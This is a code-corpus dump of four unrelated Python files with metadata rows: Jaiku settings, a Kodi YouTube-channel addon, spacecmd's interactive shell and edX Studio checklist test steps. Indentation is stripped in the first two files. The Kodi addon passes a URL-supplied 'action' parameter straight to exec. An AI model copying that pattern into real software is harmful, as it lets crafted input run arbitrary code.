# Most SMS vendors will provide a service that will post messages to a url
# on your site when an SMS has been received on their end, this setting allows
# you to add a secret value to that must exist in that url to prevent
# malicious use.
SMS_VENDOR_SECRET = 'SMS_VENDOR'
# Valid numbers on which you expect to receive SMS
SMS_TARGET = '00000'
# Whitelist regular expression for allowable mobile-terminated targets
SMS_MT_WHITELIST = re.compile('\+\d+')
# Blacklist regular expression for blocked mobile-terminated targets
SMS_MT_BLACKLIST = None
# Turn on test mode for SMS
SMS_TEST_ONLY = False
# Numbers to use when testing live SMS so you don't spam all your users
SMS_TEST_NUMBERS = []
#
# XMPP / IM
#
# Enabling IM will require a bit more than just making this True, please
# read the docs at http://code.google.com/p/jaikuengine/wiki/im_support
IM_ENABLED = False
# This is the id (JID) of the IM bot that you will use to communicate with
# users of the IM interface
IM_BOT = '[email protected]'
# Turn on test mode for IM
IM_TEST_ONLY = False
# JIDs to allow when testing live XMPP so you don't spam all your users
IM_TEST_JIDS = []
# Enable to send plain text messages only. Default is to send both plain
# text and html.
IM_PLAIN_TEXT_ONLY = False
# Truncate entry title in comments. None or 140+ means no truncation.
IM_MAX_LENGTH_OF_ENTRY_TITLES_FOR_COMMENTS = 40
#
# Task Queue
#
# Enabling the queue will allow you to process posts with larger numbers
# of followers but will require you to set up a cron job that will continuously
# ping a special url to make sure the queue gets processed
QUEUE_ENABLED = True
# The secret to use for your cron job that processes your queue
QUEUE_VENDOR_SECRET = 'SECRET'
#
# Throttling Config
#
# This will control the max number of SMS to send over a 30-day period
THROTTLE_SMS_GLOBAL_MONTH = 10000
# Settings for remote services
IMAGE_UPLOAD_ENABLED = False
IMAGE_UPLOAD_URL = 'upload.example.com'
# Settings for Google Contacts import
GOOGLE_CONTACTS_IMPORT_ENABLED = False
FEEDS_ENABLED = False
MARK_AS_SPAM_ENABLED = True
PRESS_ENABLED = False
HIDE_COMMENTS_ENABLED = True
MULTIADMIN_ENABLED = False
PRIVATE_CHANNELS_ENABLED = False
MARKDOWN_ENABLED = False
# Lists nicks of users participating in conversations underneath comment
# areas for posts. Clicking list items inserts @nicks into comment box.
# The list shows a maximum of 25 nicks.
COMMENT_QUICKLINKS_ENABLED = True
# If enabled, adds support for using access keys 1-9 to insert @nicks into
# comment box. Requires COMMENT_QUICKLINKS_ENABLED.
COMMENT_QUICKLINKS_ACCESSKEYS_ENABLED = False
PROFILE_DB = False
# Limit of avatar photo size in kilobytes
MAX_AVATAR_PHOTO_KB = 200
MAX_ACTIVATIONS = 10
# Email Test mode
EMAIL_TEST_ONLY = False
# Allowed email addresses for testing
EMAIL_TEST_ADDRESSES = []
# Email limiting, if this is set it will restrict users to those with
# email addresses in this domain
EMAIL_LIMIT_DOMAIN = None
# Things to measure to taste
MAX_COMMENT_LENGTH = 2000
# Gdata Stuff
GDATA_CONSUMER_KEY = ''
GDATA_CONSUMER_SECRET = ''
def default_email_sender():
try:
return os.environ['DJANGO_DEFAULT_FROM_EMAIL']
except KeyError:
return '[email protected]'
DEFAULT_FROM_EMAIL = default_email_sender()
DEFAULT_UNITTEST_TO_EMAIL = '[email protected]'
PROFILING_DATA_PATH = 'profiling/prof_db.csv'
# Set up the settings for the dev server if we are running it
if MANAGE_PY:
try:
from dev_settings import *
except ImportError:
pass
# Allow local overrides, useful for testing during development
try:
from local_settings import *
except ImportError:
pass
| apache-2.0 | -9,122,076,332,528,893,000 | 26.925558 | 79 | 0.734672 | false |
listamilton/supermilton.repository | plugin.video.olhardigital/default.py | 1 | 1215 | # -*- coding: utf-8 -*-
#------------------------------------------------------------
# http://www.youtube.com/user/moshipery
#------------------------------------------------------------
# License: GPL (http://www.gnu.org/licenses/gpl-3.0.html)
# Based on the code of the youtube addon
#------------------------------------------------------------
import os
import sys
import plugintools
import xbmc,xbmcaddon
from addon.common.addon import Addon
addonID = 'plugin.video.olhardigital'
addon = Addon(addonID, sys.argv)
local = xbmcaddon.Addon(id=addonID)
icon = local.getAddonInfo('icon')
YOUTUBE_CHANNEL_ID = "moshipery"
# Entry point
def run():
plugintools.log("olhardigital.run")
    # Get parameters
params = plugintools.get_params()
if params.get("action") is None:
main_list(params)
else:
action = params.get("action")
exec action+"(params)"
plugintools.close_item_list()
# Main menu
def main_list(params):
plugintools.log("olhardigital.main_list "+repr(params))
plugintools.add_item(
title = "Canal Olhar Digital",
url = "plugin://plugin.video.youtube/user/"+YOUTUBE_CHANNEL_ID+"/",
thumbnail = icon,
folder = True )
run() | gpl-2.0 | 36,636,912,093,056,300 | 24.808511 | 69 | 0.580033 | false |
renner/spacewalk | spacecmd/src/lib/shell.py | 3 | 7608 | #
# Licensed under the GNU General Public License Version 3
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright 2013 Aron Parsons <[email protected]>
#
# NOTE: the 'self' variable is an instance of SpacewalkShell
# wildcard import
# pylint: disable=W0401,W0614
# unused argument
# pylint: disable=W0613
# invalid function name
# pylint: disable=C0103
# use of exec
# pylint: disable=W0122
import atexit
import logging
import os
import readline
import re
import shlex
import sys
from cmd import Cmd
from spacecmd.utils import *
class UnknownCallException(Exception):
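    """Raised when the entered command is not recognized by the shell."""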
def __init__(self):
Exception.__init__(self)
class SpacewalkShell(Cmd):
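    """Interactive spacecmd shell built on cmd.Cmd; command implementations are
    pulled into the class namespace from the spacecmd.* modules listed below."""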
__module_list = ['activationkey', 'configchannel', 'cryptokey',
'custominfo', 'distribution', 'errata',
'filepreservation', 'group', 'kickstart',
'misc', 'org', 'package', 'repo', 'report', 'schedule',
'snippet', 'softwarechannel', 'ssm', 'api',
'system', 'user', 'utils', 'scap']
# a SyntaxError is thrown if we don't wrap this in an 'exec'
for module in __module_list:
exec('from spacecmd.%s import *' % module)
# maximum length of history file
HISTORY_LENGTH = 1024
cmdqueue = []
completekey = 'tab'
stdout = sys.stdout
prompt_template = 'spacecmd {SSM:##}> '
current_line = ''
# do nothing on an empty line
emptyline = lambda self: None
def __init__(self, options, conf_dir, config_parser):
Cmd.__init__(self)
self.session = ''
self.current_user = ''
self.server = ''
self.ssm = {}
self.config = {}
self.postcmd(False, '')
# make the options available everywhere
self.options = options
# make the configuration file available everywhere
self.config_parser = config_parser
# this is used when loading and saving caches
self.conf_dir = conf_dir
self.history_file = os.path.join(self.conf_dir, 'history')
try:
# don't split on hyphens or colons during tab completion
newdelims = readline.get_completer_delims()
newdelims = re.sub(':|-|/', '', newdelims)
readline.set_completer_delims(newdelims)
if not options.nohistory:
try:
if os.path.isfile(self.history_file):
readline.read_history_file(self.history_file)
readline.set_history_length(self.HISTORY_LENGTH)
# always write the history file on exit
atexit.register(readline.write_history_file,
self.history_file)
except IOError:
logging.error('Could not read history file')
# pylint: disable=W0702
except:
# pylint: disable=W0702
pass
# handle shell exits and history substitution
def precmd(self, line):
# disable too-many-return-statements warning
# pylint: disable=R0911
# remove leading/trailing whitespace
line = re.sub(r'^\s+|\s+$', '', line)
# don't do anything on empty lines
if line == '':
return ''
# terminate the shell
if re.match('quit|exit|eof', line, re.I):
print()
sys.exit(0)
# don't attempt to login for some commands
if re.match('help|login|logout|whoami|history|clear', line, re.I):
# login required for clear_caches or it fails with:
# "SpacewalkShell instance has no attribute 'system_cache_file'"
if not re.match('clear_caches', line, re.I):
return line
# login before attempting to run a command
if not self.session:
# disable no-member error message
# pylint: disable=E1101
self.do_login('')
if self.session == '':
return ''
parts = shlex.split(line)
if parts:
command = parts[0]
else:
return ''
        # print the help message for a command if the user passed --help
if '--help' in parts or '-h' in parts:
return 'help %s' % command
# should we look for an item in the history?
if command[0] != '!' or len(command) < 2:
return line
# remove the '!*' line from the history
# disable no-member error message
# pylint: disable=E1101
self.remove_last_history_item()
history_match = False
if command[1] == '!':
# repeat the last command
line = readline.get_history_item(
readline.get_current_history_length())
if line:
history_match = True
else:
logging.warning('%s: event not found', command)
return ''
# attempt to find a numbered history item
if not history_match:
try:
number = int(command[1:])
line = readline.get_history_item(number)
if line:
history_match = True
else:
raise Exception
except IndexError:
pass
except ValueError:
pass
# attempt to match the beginning of the string with a history item
if not history_match:
history_range = range(1, readline.get_current_history_length())
history_range.reverse()
for i in history_range:
item = readline.get_history_item(i)
if re.match(command[1:], item):
line = item
history_match = True
break
# append the arguments to the substituted command
if history_match:
if parts[1:]:
for arg in parts[1:]:
line += " '%s'" % arg
readline.add_history(line)
print(line)
return line
else:
logging.warning('%s: event not found', command)
return ''
@staticmethod
def print_result(cmdresult, cmd):
logging.debug(cmd + ": " + repr(cmdresult))
if cmd:
try:
if type(cmdresult).__name__ == 'str':
print(cmdresult)
else:
for i in cmdresult:
print(i)
except TypeError:
pass
# update the prompt with the SSM size
# pylint: disable=arguments-differ
def postcmd(self, cmdresult, cmd):
SpacewalkShell.print_result(cmdresult, cmd)
self.prompt = re.sub('##', str(len(self.ssm)), self.prompt_template)
def default(self, line):
Cmd.default(self, line)
raise UnknownCallException
| gpl-2.0 | -6,142,400,948,772,226,000 | 30.053061 | 79 | 0.560594 | false |
pomegranited/edx-platform | cms/djangoapps/contentstore/features/checklists.py | 3 | 4725 | # pylint: disable=missing-docstring
# pylint: disable=redefined-outer-name
from lettuce import world, step
from nose.tools import assert_true, assert_equal
from selenium.common.exceptions import StaleElementReferenceException
############### ACTIONS ####################
@step('I select Checklists from the Tools menu$')
def i_select_checklists(step):
world.click_tools()
link_css = 'li.nav-course-tools-checklists a'
world.css_click(link_css)
world.wait_for_ajax_complete()
@step('I have opened Checklists$')
def i_have_opened_checklists(step):
step.given('I have opened a new course in Studio')
step.given('I select Checklists from the Tools menu')
@step('I see the four default edX checklists$')
def i_see_default_checklists(step):
checklists = world.css_find('.checklist-title')
assert_equal(4, len(checklists))
assert_true(checklists[0].text.endswith('Getting Started With Studio'))
assert_true(checklists[1].text.endswith('Draft a Rough Course Outline'))
assert_true(checklists[2].text.endswith("Explore edX\'s Support Tools"))
assert_true(checklists[3].text.endswith('Draft Your Course About Page'))
@step('I can check and uncheck tasks in a checklist$')
def i_can_check_and_uncheck_tasks(step):
# Use the 2nd checklist as a reference
verifyChecklist2Status(0, 7, 0)
toggleTask(1, 0)
verifyChecklist2Status(1, 7, 14)
toggleTask(1, 3)
verifyChecklist2Status(2, 7, 29)
toggleTask(1, 6)
verifyChecklist2Status(3, 7, 43)
toggleTask(1, 3)
verifyChecklist2Status(2, 7, 29)
@step('the tasks are correctly selected$')
def tasks_correctly_selected(step):
verifyChecklist2Status(2, 7, 29)
# verify that task 7 is still selected by toggling its checkbox state and making sure that it deselects
world.browser.execute_script("window.scrollBy(0,1000)")
toggleTask(1, 6)
verifyChecklist2Status(1, 7, 14)
@step('I select a link to the course outline$')
def i_select_a_link_to_the_course_outline(step):
clickActionLink(1, 0, 'Edit Course Outline')
@step('I am brought to the course outline page$')
def i_am_brought_to_course_outline(step):
assert world.is_css_present('body.view-outline')
assert_equal(1, len(world.browser.windows))
@step('I am brought back to the course outline in the correct state$')
def i_am_brought_back_to_course_outline(step):
step.given('I see the four default edX checklists')
# In a previous step, we selected (1, 0) in order to click the 'Edit Course Outline' link.
# Make sure the task is still showing as selected (there was a caching bug with the collection).
verifyChecklist2Status(1, 7, 14)
@step('I select a link to help page$')
def i_select_a_link_to_the_help_page(step):
clickActionLink(2, 0, 'Visit Studio Help')
@step('I am brought to the help page in a new window$')
def i_am_brought_to_help_page_in_new_window(step):
step.given('I see the four default edX checklists')
windows = world.browser.windows
assert_equal(2, len(windows))
world.browser.switch_to_window(windows[1])
assert_equal('http://help.edge.edx.org/', world.browser.url)
############### HELPER METHODS ####################
def verifyChecklist2Status(completed, total, percentage):
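    """Assert that the second checklist (index 1) shows the given completed count, total, and percentage."""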
def verify_count(driver):
try:
statusCount = world.css_find('#course-checklist1 .status-count').first
return statusCount.text == str(completed)
except StaleElementReferenceException:
return False
world.wait_for(verify_count)
assert_equal(str(total), world.css_find('#course-checklist1 .status-amount').first.text)
# Would like to check the CSS width, but not sure how to do that.
assert_equal(str(percentage), world.css_find('#course-checklist1 .viz-checklist-status-value .int').first.text)
def toggleTask(checklist, task):
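    """Toggle the checkbox for the given task in the given checklist and wait for the AJAX update."""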
world.css_click('#course-checklist' + str(checklist) + '-task' + str(task))
world.wait_for_ajax_complete()
# TODO: figure out a way to do this in phantom and firefox
# For now we will mark the scenarios that use this method as skipped
def clickActionLink(checklist, task, actionText):
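    """Wait for the task's action link to show actionText (toggling the task if needed), then click it."""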
# text will be empty initially, wait for it to populate
def verify_action_link_text(driver):
actualText = world.css_text('#course-checklist' + str(checklist) + ' a', index=task)
if actualText == actionText:
return True
else:
# toggle checklist item to make sure that the link button is showing
toggleTask(checklist, task)
return False
world.wait_for(verify_action_link_text)
world.css_click('#course-checklist' + str(checklist) + ' a', index=task)
world.wait_for_ajax_complete()
| agpl-3.0 | 3,535,864,958,596,505,600 | 36.8 | 115 | 0.695661 | false |